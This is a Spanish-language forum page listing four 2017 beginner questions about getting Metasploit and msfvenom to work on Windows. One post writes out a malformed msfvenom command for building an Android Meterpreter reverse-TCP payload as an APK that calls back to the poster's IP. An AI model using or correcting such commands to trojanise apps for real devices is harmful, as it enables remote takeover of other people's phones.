elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Hacking / Podrían explicarme como agregar exploit a metasploit en: 7 Agosto 2017, 22:53 pm
Leo y por lo visto no lo suficiente quizás xq no pude encontrar la forma de hacerlo bien, uso Windows y no logró agregar exploit, los e puesto en todas las carpetas que lei en los post pero aún así al iniciar meta me dice error ae sintaxis y no me carga lo q descargue. Cuamquiee aporte me sirve. Grax
2  Seguridad Informática / Hacking / Msfvenom alguien me ayuda en: 1 Agosto 2017, 14:15 pm
Buenas soy nuevo con metasploit y estoy creandoun archivo .apk pero el meta no me reconoce el comando msfvenom a que se puede dejar esto? Puede ser que reemplazara hoy en día como pasó payload.
... :silbar:agradezco cualquier comentario
3  Seguridad Informática / Hacking / Metasploit dl deprecated las fiddle! en: 1 Agosto 2017, 00:49 am
Sin más que decir alguien sabe solucionar ese error!!?????
4  Seguridad Informática / Hacking / Metasploit windows ayuda! en: 31 Julio 2017, 15:21 pm
Buenas soy nuevo en el foro y estoy iniciandome en metasploit. Mi problema es el siguiente. Inicio metasploit pro, tengo win7, quiero crear un archivo apk.  Cuestiones yo a lo que hago y ustedes ño dirán el error.  Consola metasploit escribo " msfvenom-p android/meterpreter/reverse_tcp LHOST= ahí pongo mi ip LHOST=4546 R < /root/desktop/system.apk al darle entre me dice que la Ruta especificada no puede encontrarse o algo similar. Podrian decirme cual son los posibles fallos :-\ >:D
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines